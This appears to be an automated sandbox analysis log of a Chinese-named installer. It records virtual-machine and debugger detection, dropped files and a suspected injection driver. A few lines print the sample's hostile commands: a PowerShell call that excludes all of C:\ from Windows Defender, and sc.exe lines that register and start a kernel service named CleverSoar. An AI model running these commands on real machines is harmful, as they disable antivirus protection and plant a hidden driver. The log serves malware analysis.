Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6310	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3336	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Window / User API: threadDelayed 604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Window / User API: threadDelayed 567	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Window / User API: threadDelayed 577	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-0F5J3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Program Files (x86)\Windows NT\7zr.exe

API coverage: 7.4 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428

Thread sleep time: -11068046444225724s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA1AEC0 FindFirstFileA,FindClose,		6_2_6CA1AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		10_2_00AF6868

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00AF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

10_2_00AF7496

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00AF9C60 GetSystemInfo,

10_2_00AF9C60

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2107441291.0000000001287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2107441291.0000000001287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Code function: 6_2_6C8A3886 NtSetInformationThread 00000000,00000011,00000000,00000000

6_2_6C8A3886

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Code function: 6_2_6CA30181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_6CA30181

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00B757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

10_2_00B757D0

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA39D35 mov eax, dword ptr fs:[00000030h]	6_2_6CA39D35
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA39D66 mov eax, dword ptr fs:[00000030h]	6_2_6CA39D66
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA2F17D mov eax, dword ptr fs:[00000030h]	6_2_6CA2F17D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA28CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_6CA28CBD
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA30181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_6CA30181

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"			Jump to behavior

Found driver which could be used to inject code into processes

Source: tProtect.dll.12.dr

Static PE information: Found potential injection code

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
